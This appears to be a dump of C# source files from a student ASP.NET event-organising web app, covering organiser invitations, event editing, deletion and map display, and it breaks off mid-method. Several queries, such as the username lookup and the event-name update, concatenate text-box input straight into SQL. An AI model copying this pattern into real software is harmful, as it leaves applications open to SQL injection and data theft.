this.Cord.Add(new Coordinats.Coord(x, y));
}
public void SetCoord(Coordinats.Coord c)
{
this.Cord.Add(c);
}
public void SetLength()
{
this.iLength--;
}
public static int CheckDir(int i)
{
if (i < 25)
{
return 0;
}
else if (i >= 25 && i < 50)
{
return 1;
}
else if (i >= 50 && i < 75)
{
return 2;
}
else
return 3;
}
public static int CheckPov(int i)
{
if (i < 33)
{
return 0;
}
else if (i >= 33 && i < 66)
{
return 1;
}
else
return 2;
}
}
}
|
41de11a20b5a6996ef7e450151d1e2a203a6c6b4
|
[
"C#"
] | 4
|
C#
|
Morigun/PathCreator
|
3a779aa8bb6d1a97e549ad01a400d96a202fd515
|
8e4ec4b77f7ca58884f5278b82c2e65a40dafec7
|
refs/heads/master
|
<repo_name>B15IP/PIPv37<file_sep>/PIP/OrganizatoriEveniment.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
public partial class OrganizatoriEveniment : System.Web.UI.Page
{
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
bool Proprietar = false;
protected void Page_Load(object sender, EventArgs e)
{
VerificareProprietar(sender, e);
if (Proprietar)
{
ButtonInvitaOrganizatori.Visible = true;
OrganizatoriInvitati();
}
}
private void VerificareProprietar(object sender, EventArgs e)
{
if (Session["nume"] != null)
{
int Id_curent = Convert.ToInt32(Session["Id"]);
int Id_prop = 0;
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select id_proprietar from evenimente where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
Id_prop = SRD.GetInt32(SRD.GetOrdinal("id_proprietar"));
}
}
sqlConnection1.Close();
if (Id_prop == Id_curent)
Proprietar = true;
}
}
protected void ButtonInvitaOrganizatori_Click(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
int utilizatorExista = 0, idUtilizatorInvitat = -1;
if (UserNameOrganizatorInvitat.Text == "")
{
MesajEroare.Text = "Va rugam sa completati casuta text cu un username";
return;
}
try // verificare ca exista acest username
{
sqlConnection1.Open();
cmd.CommandText = "Select count(id) from utilizator where acont COLLATE SQL_Latin1_General_CP1_CS_AS ='" + UserNameOrganizatorInvitat.Text + "' COLLATE SQL_Latin1_General_CP1_CS_AS ;";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
utilizatorExista = Convert.ToInt32(cmd.ExecuteScalar());
}
catch (Exception ex)
{
MesajEroare.Text = ex.Message;
}
sqlConnection1.Close();
if (utilizatorExista == 0)
{
MesajEroare.Text = "Utilizator nu exista";
return;
}
try // selectarea id-ului celui invitat
{
sqlConnection1.Open();
cmd.CommandText = "Select id from utilizator where acont COLLATE SQL_Latin1_General_CP1_CS_AS ='" + UserNameOrganizatorInvitat.Text + "' COLLATE SQL_Latin1_General_CP1_CS_AS;";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
idUtilizatorInvitat = SRD.GetInt32(SRD.GetOrdinal("id"));
}
}
}
catch (Exception ex)
{
MesajEroare.Text = ex.Message;
}
sqlConnection1.Close();
utilizatorExista = 0;
try // verificare daca exista deja aceasta invitatie - desi e verificata de cheia primara
{
sqlConnection1.Open();
cmd.CommandText = "Select count(id_organizator) from organizeaza where id_eveniment =" + Session["IdEvenimentSelectat"] + " and id_organizator = " + idUtilizatorInvitat;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
// am facut economie de variabile si am folosit tot utilizatorExista
utilizatorExista = Convert.ToInt32(cmd.ExecuteScalar());
}
catch (Exception ex)
{
MesajEroare.Text = ex.Message;
}
sqlConnection1.Close();
// verific si ca nu cumva sa-si trimita lui(proprietarul) invitatie
if (utilizatorExista != 0 || idUtilizatorInvitat == (int)Session["id"])
{
MesajEroare.Text = "Mai introduceti inca o data username-ul";
return;
}
try // inserarea in organizeaza cu aprobat luat default false
{
sqlConnection1.Open();
cmd.CommandText = "Insert into organizeaza(id_eveniment,id_organizator) values( " + Session["IdEvenimentSelectat"] + ", " + idUtilizatorInvitat + ")";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
cmd.ExecuteNonQuery();
}
catch (Exception ex)
{
MesajEroare.Text = ex.Message;
}
sqlConnection1.Close();
LabelInvitatieTrimisa.Text = "Invitatie trimisa cu succes ";
// Response.Redirect("OrganizatoriEveniment.aspx");
Response.Redirect("OrganizatoriEveniment.aspx");
}
protected void OrganizatoriInvitati(){
SqlCommand cmd = new SqlCommand();
int organizatoriExista = 0;
try
{
String query = "SELECT count(id_eveniment) from organizeaza where id_eveniment = " + Session["idEvenimentSelectat"] ;
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
organizatoriExista = Convert.ToInt32(cmd.ExecuteScalar());
}
catch (Exception ex)
{
MesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
if (organizatoriExista != 0)
{
try
{
String query = "SELECT id_organizator,aprobat from organizeaza where id_eveniment = " + Session["idEvenimentSelectat"];
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
List<int> idFiecareOrganizator = new List<int>();
List<Boolean> Aprobat = new List<Boolean>();
DataTable Table_ListaOrganizatori = new DataTable();
if (Table_ListaOrganizatori.Columns.Count == 0)
{
Table_ListaOrganizatori.Columns.Add("Account", typeof(string));
Table_ListaOrganizatori.Columns.Add("Status", typeof(string));
}
using (SqlDataReader fiecareOrganizator = cmd.ExecuteReader())
{
while (fiecareOrganizator.Read())
{
idFiecareOrganizator.Add(fiecareOrganizator.GetInt32(fiecareOrganizator.GetOrdinal("id_organizator")));
Aprobat.Add(fiecareOrganizator.GetBoolean(fiecareOrganizator.GetOrdinal("aprobat")));
}
fiecareOrganizator.Close();
}
// pentru fiecare id luam username-ul si il afisam alaturi de statusul curent
for(int id = 0; id < idFiecareOrganizator.Count; id ++){
query = "SELECT acont from utilizator where id = " + idFiecareOrganizator[id];
cmd.CommandText = query;
SqlDataReader fiecareAcont = cmd.ExecuteReader(); // execut comanda SQL
fiecareAcont.Read();
DataRow NewRow = Table_ListaOrganizatori.NewRow(); //un nou rand!!!
NewRow[0] = fiecareAcont.GetString(fiecareAcont.GetOrdinal("acont"));
if(Aprobat[id] == true){
NewRow[1] = "acceptat";
}
else
if (Aprobat[id] == false)
{
NewRow[1] = "pending";
}
Table_ListaOrganizatori.Rows.Add(NewRow); // adaug rand nou
fiecareAcont.Close();
}
listaOrganizatoriEvent.DataSource = Table_ListaOrganizatori;
listaOrganizatoriEvent.DataBind();
int index_organizator = 0; //pentru fiecare id de eveniment
foreach (GridViewRow row in listaOrganizatoriEvent.Rows)
{
int i = 0;
LinkButton elimina = new LinkButton();
elimina.ID = "a" + idFiecareOrganizator[index_organizator].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
elimina.Text = "Elimina";
elimina.Click += new EventHandler(eliminaOrganizator);
row.Cells[i].Controls.Add(elimina);
//i++;
//LinkButton linkCatreEveniment = new LinkButton();
//linkCatreEveniment.ID = "l" + idFiecareEveniment[index_eveniment].ToString();
//linkCatreEveniment.Text = "Click";
//linkCatreEveniment.Click += new EventHandler(catrePaginaEveniment);
//row.Cells[i].Controls.Add(linkCatreEveniment);
index_organizator++;
}
}
catch (Exception ex)
{
MesajEroare.Text += " Nu merge " + ex.Message;
}
sqlConnection1.Close();
}
}
protected void eliminaOrganizator(object sender, EventArgs e)
{
LinkButton eveniment = (LinkButton)sender;
int idOrg = 0;
if (eveniment.Text == "Elimina")
{
idOrg = Convert.ToInt32(eveniment.ID.Substring(1));
}
SqlCommand cmd = new SqlCommand();
try
{
String query = "Delete from organizeaza where id_eveniment = " + Session["idEvenimentSelectat"] + " and id_organizator = " + idOrg;
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
cmd.ExecuteNonQuery();
}
catch (Exception ex)
{
MesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
Response.Redirect("OrganizatoriEveniment.aspx");
}
protected void inapoi_Click(object sender, EventArgs e)
{
Response.Redirect("Eveniment.aspx");
}
}<file_sep>/PIP/Eveniment.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI.HtmlControls;
using System.IO;
using System.Data.OleDb;
//----------------------------------------------------------------------------------------
using Subgurim.Controles;
using Subgurim.Controles.GoogleChartIconMaker;
using System.Drawing;
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
public partial class Eveniment : System.Web.UI.Page
{
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
SqlConnection sqlConnection2 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
bool Proprietar = false;
bool Organizator = false;
override protected void OnInit(EventArgs e)
{
InitializeComponent();
base.OnInit(e);
}
private void InitializeComponent()
{
this.Load += new System.EventHandler(this.Page_Load);
this.cmdSend.Click += new System.EventHandler(this.cmdSend_Click);
}
protected void Page_Load(object sender, EventArgs e)
{
ButtonStergeEveniment.Visible = false;
Label11sterge.Visible = false;
ButtonStergeEvenimentOK.Visible = false;
ButtonStergeEvenimentNO.Visible = false;
PanelParticipanti.Visible = false;
MesajRaspuns.Text = "";
LabelEroareRol.Text = "";
lblInfo.Text = "";
this.ButtonAdaugaRol2.Click += new System.EventHandler(this.ButtonAdaugaRol2_Click);
this.ButtonAfisareParticipanti.Click += new System.EventHandler(this.ButtonAfiseazaParticipanti_Click);
AfiseazaParticipanti();
MesajRaspuns.Text = "";
cmdSend.Visible = false;
lblFile.Visible = false;
filMyFile.Visible = false;
numeEveniment.Visible = false;
descriereEveniment.Visible = false;
ziuaEveniment.Visible = false;
lista_luni.Visible = false;
anEveniment.Visible = false;
lunaEveniment.Visible = false;
oraEveniment.Visible = false;
minutEveniment.Visible = false;
etichetaEveniment.Visible = false;
orasEveniment.Visible = false;
judetEveniment.Visible = false;
taraEveniment.Visible = false;
ButtonEditeazaNume.Visible = false;
ButtonEditeazaEtichete.Visible = false;
ButtonEditeazaDescriere.Visible = false;
ButtonEditeazaData.Visible = false;
ButtonEditeazaOras.Visible = false;
ButtonEditeazaJudet.Visible = false;
ButtonEditeazaTara.Visible = false;
ButtonAdaugaRol2.Visible = false;
LabelDenumire.Visible = false;
LabelDescriere.Visible = false;
LabelMaxUsers.Visible = false;
DenumireRol.Visible = false;
DescriereRol.Visible = false;
MaxUsers.Visible = false;
ButtonSubmitRol2.Visible = false;
ButtonSubmitNume.Visible = false;
ButtonSubmitEtichete.Visible = false;
ButtonSubmitDescriere.Visible = false;
ButtonSubmitData.Visible = false;
ButtonSubmitOras.Visible = false;
ButtonSubmitJudet.Visible = false;
ButtonSubmitTara.Visible = false;
ButtonInvitaOrganizatori.Visible = false;
textbox_latitudine.Visible = false;
textbox_longitudine.Visible = false;
ButtonIntroduceDateLocatie.Visible = false;
VerificareProprietar(sender, e);
if (Session["nume"] == null)
ButtonComentariu.Visible = false;
else ButtonComentariu.Visible = true;
if (Proprietar)
{
ButtonAdaugaRol2.Visible = true;
ButtonEditeazaNume.Visible = true;
ButtonEditeazaEtichete.Visible = true;
ButtonEditeazaDescriere.Visible = true;
ButtonEditeazaData.Visible = true;
ButtonEditeazaOras.Visible = true;
ButtonEditeazaJudet.Visible = true;
ButtonEditeazaTara.Visible = true;
ButtonInvitaOrganizatori.Visible = true;
cmdSend.Visible = true;
lblFile.Visible = true;
filMyFile.Visible = true;
ButtonStergeEveniment.Visible = true;
editareLocatie();
textbox_latitudine.Visible = true;
textbox_longitudine.Visible = true;
ButtonIntroduceDateLocatie.Visible = true;
// ButtonLocatie.Visible = true;
}
else
{
VerificareOrganizator(sender, e);
// MesajRaspuns.Text += "* "+Session["idEvenimentSelectat"]+Session["Id"];
if (Organizator)
{
// MesajRaspuns.Text += "lala";
ButtonAdaugaRol2.Visible = true;
ButtonEditeazaNume.Visible = true;
ButtonEditeazaEtichete.Visible = true;
ButtonEditeazaDescriere.Visible = true;
ButtonEditeazaData.Visible = true;
ButtonEditeazaOras.Visible = true;
ButtonEditeazaJudet.Visible = true;
ButtonEditeazaTara.Visible = true;
ButtonInvitaOrganizatori.Visible = false;
cmdSend.Visible = true;
lblFile.Visible = true;
filMyFile.Visible = true;
}
}
UmplereInformatii(sender, e);
////----------------------------------------------------------------------
afisareHarta();
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Afiseaza_Fisiere();
Afiseaza_Roluri();
Afiseaza_NumarParticipanti();
if (PanelForum.Visible == true)
ButtonForum_Click(sender, e);
}
protected void ButtonIntrebareSterge_Click(object sender, EventArgs e)
{
ButtonStergeEveniment.Visible = false;
Label11sterge.Visible = true;
ButtonStergeEvenimentOK.Visible = true;
ButtonStergeEvenimentNO.Visible = true;
}
protected void ButtonStergeEveniment_Click(object sender, EventArgs e)
{
string nume;
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select document from documente where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
nume = SRD.GetString(SRD.GetOrdinal("document")).ToString();
File.Delete(Server.MapPath(nume));
}
}
sqlConnection1.Close();
SqlCommand cmd2 = new SqlCommand();
cmd2.Connection = sqlConnection1;
cmd2.CommandType = CommandType.Text;
cmd2.CommandText = "delete from documente where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd2.ExecuteNonQuery();
sqlConnection1.Close();
SqlCommand cmd3 = new SqlCommand();
cmd3.Connection = sqlConnection1;
cmd3.CommandType = CommandType.Text;
cmd3.CommandText = "delete from organizeaza where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd3.ExecuteNonQuery();
sqlConnection1.Close();
SqlCommand cmd4 = new SqlCommand();
cmd4.Connection = sqlConnection1;
cmd4.CommandType = CommandType.Text;
cmd4.CommandText = "delete from participa where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd4.ExecuteNonQuery();
sqlConnection1.Close();
SqlCommand cmd5 = new SqlCommand();
cmd5.Connection = sqlConnection1;
cmd5.CommandType = CommandType.Text;
cmd5.CommandText = "delete from replici where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd5.ExecuteNonQuery();
sqlConnection1.Close();
SqlCommand cmd6 = new SqlCommand();
cmd6.Connection = sqlConnection1;
cmd6.CommandType = CommandType.Text;
cmd6.CommandText = "delete from roluri where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd6.ExecuteNonQuery();
sqlConnection1.Close();
SqlCommand cmd7 = new SqlCommand();
cmd7.Connection = sqlConnection1;
cmd7.CommandType = CommandType.Text;
cmd7.CommandText = "delete from evenimente where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd7.ExecuteNonQuery();
sqlConnection1.Close();
Response.Redirect("homepage.aspx");
}
protected void ButtonIntrebareReturn_Click(object sender, EventArgs e)
{
ButtonStergeEveniment.Visible = true;
Label11sterge.Visible = false;
ButtonStergeEvenimentOK.Visible = false;
ButtonStergeEvenimentNO.Visible = false;
}
protected void UmplereInformatii(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
sqlConnection1.Open();
cmd.CommandText = "select nume+' '+prenume from utilizator where id=(select id_proprietar from evenimente where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ");";
cmd.CommandType = CommandType.Text;
proprietarLabel.Text = cmd.ExecuteScalar().ToString();
cmd.CommandText = "select * from evenimente where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
numeEvenimentLabel.Text = SRD.GetString(SRD.GetOrdinal("nume"));
if (Convert.IsDBNull(SRD["data_inceperii"]))
{
ziuaEvenimentLabel.Text = "";
anEvenimentLabel.Text = "";
lunaEvenimentLabel.Text = "";
oraEvenimentLabel.Text = "";
minutEvenimentLabel.Text = "";
}
else
{
ziuaEvenimentLabel.Text = (SRD.GetDateTime(SRD.GetOrdinal("data_inceperii")).Day).ToString();
anEvenimentLabel.Text = (SRD.GetDateTime(SRD.GetOrdinal("data_inceperii")).Year).ToString();
lunaEvenimentLabel.Text = (SRD.GetDateTime(SRD.GetOrdinal("data_inceperii")).Month).ToString();
oraEvenimentLabel.Text = (SRD.GetDateTime(SRD.GetOrdinal("data_inceperii")).Hour).ToString();
minutEvenimentLabel.Text = (SRD.GetDateTime(SRD.GetOrdinal("data_inceperii")).Minute).ToString();
}
// etichetaEvenimentLabel.Text = SRD.GetString(SRD.GetOrdinal("etichete"));
if (Convert.IsDBNull(SRD["descriere"]))
{
descriereEvenimentLabel.Text = "Nu este stabilita.";
}
else
{
descriereEvenimentLabel.Text = SRD.GetString(SRD.GetOrdinal("descriere"));
}
if (Convert.IsDBNull(SRD["oras"]))
{
orasEvenimentLabel.Text = "Nu este stabilit.";
}
else
{
orasEvenimentLabel.Text = SRD.GetString(SRD.GetOrdinal("oras"));
}
if (Convert.IsDBNull(SRD["judet"]))
{
judetEvenimentLabel.Text = "Nu este stabilit.";
}
else
{
judetEvenimentLabel.Text = SRD.GetString(SRD.GetOrdinal("judet"));
}
if (Convert.IsDBNull(SRD["tara"]))
{
taraEvenimentLabel.Text = "Nu este stabilit.";
}
else
{
taraEvenimentLabel.Text = SRD.GetString(SRD.GetOrdinal("tara"));
}
}
}
sqlConnection1.Close();
}
//----------------------------------------------------------------------------------
private void afisareHarta()
{ /*
double lat = 45.662943, longi = 25.612564;
SqlCommand cmd = new SqlCommand();
try
{
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select count(*) from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (Convert.ToInt32(cmd.ExecuteScalar()) != 0)
{
cmd.CommandText = "select latitudine,longitudine from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
lat = SRD.GetDouble(SRD.GetOrdinal("latitudine"));
longi = SRD.GetDouble(SRD.GetOrdinal("longitudine"));
}
}
}
}
catch (Exception)
{
MesajRaspuns.Text = "eroareeeeeeeeeeeee";
}
sqlConnection1.Close();
GMap1.Key = "gmapkey_localhost";
GMarker marker = new GMarker(new GLatLng(39.5, -3.2));
GInfoWindow window = new GInfoWindow(marker, "<center><b>GoogleMaps.Subgurim.NET</b></center>", true);
GMap1.addInfoWindow(window);
*/
/*
GMap1.setCenter(new GLatLng(41, 3), 3);
GMap1.Add(new GControl(GControl.preBuilt.LargeMapControl));
GMarker m1 = new GMarker(new GLatLng(41, 3));
MarkerManager mManager = new MarkerManager();
mManager.Add(m1, 2);
List<GMarker> mks = new List<GMarker>();
List<GInfoWindow> iws = new List<GInfoWindow>();
Random r = new Random();
double ir1, ir2;
GMarker mkr;
for (int i = 0; i < 10; i++)
{
ir1 = (double)r.Next(40) / 10.0 - 2.0;
ir2 = (double)r.Next(40) / 10.0 - 2.0;
mkr = new GMarker(m1.point + new GLatLng(ir1, ir2));
mks.Add(mkr);
GMap1.Add(new GListener(mkr.ID, GListener.Event.click, "function(){alert('" + i + "');}"));
}
for (int i = 0; i < 5; i++)
{
ir1 = (double)r.Next(40) / 20.0 - 1;
ir2 = (double)r.Next(40) / 20.0 - 1;
mkr = new GMarker(m1.point + new GLatLng(ir1, ir2));
GInfoWindow window = new GInfoWindow(mkr, i.ToString());
iws.Add(window);
}
mManager.Add(mks, 6, 8);
mManager.Add(iws, 7, 8);
GMap1.markerManager = mManager;
*/
string skey = "<KEY>";
GMap1.Key = skey;
GMap1.addControl(new GControl(GControl.preBuilt.GOverviewMapControl));
GMap1.addControl(new GControl(GControl.preBuilt.LargeMapControl));
double lat = 45.662943, longi = 25.612564;
SqlCommand cmd = new SqlCommand();
try
{
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select count(*) from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (Convert.ToInt32(cmd.ExecuteScalar()) != 0)
{
cmd.CommandText = "select latitudine,longitutine from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
// MesajRaspuns.Text = "2";
lat = (SRD.GetDouble(0));
longi = (SRD.GetDouble(1));
// MesajRaspuns.Text += "3";
}
}
GMarker marker = new GMarker(new GLatLng(lat, longi));
//creating pushpin window with content
GInfoWindow window = new GInfoWindow(marker, "<center><b></b></center>", true);
//creating new marker for second location
GMarker marker1 = new GMarker(new GLatLng(16.3, 79.4));
//creating second pushpin window
// GInfoWindow windo1 = new GInfoWindow(marker1, "<center><b>Loyapalli, India </b></center>", true);
//adding windows in GMap control
GMap1.addInfoWindow(window);
// GMap1.addInfoWindow(windo1);
}
else
{
GMap1.Visible = false;
}
}
catch (Exception ex)
{
MesajRaspuns.Text += "eroareeeeeeeeeeeee in afisare harta " + ex.Message;
}
sqlConnection1.Close();
//creating marker with latitude and logitude
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
private void VerificareProprietar(object sender, EventArgs e)
{
if (Session["nume"] != null)
{
int Id_curent = Convert.ToInt32(Session["Id"]);
int Id_prop = 0;
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select id_proprietar from evenimente where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
Id_prop = SRD.GetInt32(SRD.GetOrdinal("id_proprietar"));
}
}
sqlConnection1.Close();
if (Id_prop == Id_curent)
Proprietar = true;
}
}
private void VerificareOrganizator(object sender, EventArgs e)
{
if (Session["nume"] != null)
{
int Id_curent = Convert.ToInt32(Session["Id"]);
int Id_organizator = 0;
// MesajRaspuns.Text += "&";
try
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
// MesajRaspuns.Text += "1";
cmd.CommandText = "select id_organizator from organizeaza where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + " and id_organizator = " + Session["Id"] + " and aprobat=1;";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
// MesajRaspuns.Text += "2-";
Id_organizator = SRD.GetInt32(SRD.GetOrdinal("id_organizator"));
// MesajRaspuns.Text += "3-";
}
}
}
catch (Exception ex)
{
MesajRaspuns.Text += " " + ex.Message;
}
sqlConnection1.Close();
// MesajRaspuns.Text += Id_organizator + " = " + Id_curent;
if (Id_organizator == Id_curent)
Organizator = true;
}
}
protected void ButtonEditeazaNume_Click(object Sender, EventArgs e)
{
numeEveniment.Visible = true;
ButtonSubmitNume.Visible = true;
ButtonEditeazaNume.Visible = false;
numeEveniment.Text = numeEvenimentLabel.Text;
}
protected void ButtonEditeazaData_Click(object Sender, EventArgs e)
{
ziuaEveniment.Visible = true;
lista_luni.Visible = true;
anEveniment.Visible = true;
oraEveniment.Visible = true;
minutEveniment.Visible = true;
ButtonSubmitData.Visible = true;
ButtonEditeazaData.Visible = false;
ziuaEveniment.Text = ziuaEvenimentLabel.Text;
anEveniment.Text = anEvenimentLabel.Text;
oraEveniment.Text = oraEvenimentLabel.Text;
minutEveniment.Text = minutEvenimentLabel.Text;
}
protected void ButtonEditeazaDescriere_Click(object Sender, EventArgs e)
{
descriereEveniment.Visible = true;
ButtonSubmitDescriere.Visible = true;
ButtonEditeazaDescriere.Visible = false;
descriereEveniment.Text = descriereEvenimentLabel.Text;
}
protected void ButtonEditeazaEtichete_Click(object Sender, EventArgs e)
{
etichetaEveniment.Visible = true;
ButtonSubmitEtichete.Visible = true;
ButtonEditeazaEtichete.Visible = false;
etichetaEveniment.Text = etichetaEvenimentLabel.Text;
}
protected void ButtonEditeazaOras_Click(object Sender, EventArgs e)
{
orasEveniment.Visible = true;
ButtonSubmitOras.Visible = true;
ButtonEditeazaOras.Visible = false;
orasEveniment.Text = orasEvenimentLabel.Text;
}
protected void ButtonEditeazaJudet_Click(object Sender, EventArgs e)
{
judetEveniment.Visible = true;
ButtonSubmitJudet.Visible = true;
ButtonEditeazaJudet.Visible = false;
judetEveniment.Text = judetEvenimentLabel.Text;
}
protected void ButtonEditeazaTara_Click(object Sender, EventArgs e)
{
taraEveniment.Visible = true;
ButtonSubmitTara.Visible = true;
ButtonEditeazaTara.Visible = false;
taraEveniment.Text = taraEvenimentLabel.Text;
}
protected void ButtonSubmitNume_Click(object Sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set nume='" + numeEveniment.Text + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (numeEveniment.Text != "")
{
cmd.ExecuteNonQuery();
numeEvenimentLabel.Text = numeEveniment.Text;
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
else MesajRaspuns.Text = "Eroare!";
sqlConnection1.Close();
}
protected void ButtonSubmitData_Click(object Sender, EventArgs e)
{
int zi = DateTime.Now.Day, luna = DateTime.Now.Month, an = DateTime.Now.Year, ora = DateTime.Now.Hour, minut = DateTime.Now.Minute;
if (Int32.TryParse(oraEveniment.Text, out ora) == false)
{
MesajRaspuns.Text = "Introduceti o ora numar intreg";
return;
}
else
{
if (ora > 23 || ora < 0)
{
MesajRaspuns.Text = "Introduceti o ora numar intreg intre 0 si 23 ";
return;
}
}
if (Int32.TryParse(minutEveniment.Text, out minut) == false)
{
MesajRaspuns.Text = "Introduceti un minut numar intreg";
return;
}
else
{
if (ora > 59 || ora < 0)
{
MesajRaspuns.Text = "Introduceti un minut numar intreg intre 0 si 59 ";
return;
}
}
if (Int32.TryParse(anEveniment.Text, out an) == false)
{
MesajRaspuns.Text = "Introduceti un an numar intreg";
return;
}
else
{
if (an < DateTime.Now.Year || an > 3000)
{
MesajRaspuns.Text = "Introduceti un an numar intreg intre " + DateTime.Now.Year + " si 3000 ";
return;
}
}
luna = lista_luni.SelectedIndex + 1;
bool paritateLuna = false; // false e luna impara, true e luna para
if (luna % 2 == 0)
{
paritateLuna = true;
}
if (Int32.TryParse(ziuaEveniment.Text, out zi) == false)
{
MesajRaspuns.Text = "Introduceti o zi numar intreg";
return;
}
else
{
if (paritateLuna == true)
{
if (luna == 2)
{ // daca e februarie
if ((an % 100 == 0) && (an % 400 != 0))
{ // verific daca e an bisect
if (zi < 1 || zi > 29)
{
MesajRaspuns.Text = "Introduceti o zi numar intreg intre 1 si 29 ";
return;
}
}
else
if (an % 4 == 0)
{
if (zi < 1 || zi > 29)
{
MesajRaspuns.Text = "Introduceti o zi numar intreg intre 1 si 29 ";
return;
}
}
else
{
if (zi < 1 || zi > 28)
{
MesajRaspuns.Text = "Introduceti o zi numar intreg intre 1 si 28 ";
return;
}
}
}
if (zi < 1 || zi > 30)
{
MesajRaspuns.Text = "Introduceti o zi numar intreg intre 1 si 30 ";
return;
}
}
else
if (zi < 1 || zi > 31)
{
MesajRaspuns.Text = "Introduceti o zi numar intreg intre 1 si 31 ";
return;
}
}
DateTime data = DateTime.Now;
string dataString = luna + "." + zi + "." + an + " " + ora + ":" + minut;
MesajRaspuns.Text = dataString;
try
{
data = Convert.ToDateTime(dataString);
}
catch (Exception ex)
{
MesajRaspuns.Text += ex.Message;
}
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set data_inceperii='" + data + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
try
{
cmd.ExecuteNonQuery();
ziuaEvenimentLabel.Text = zi.ToString();
lunaEvenimentLabel.Text = luna.ToString();
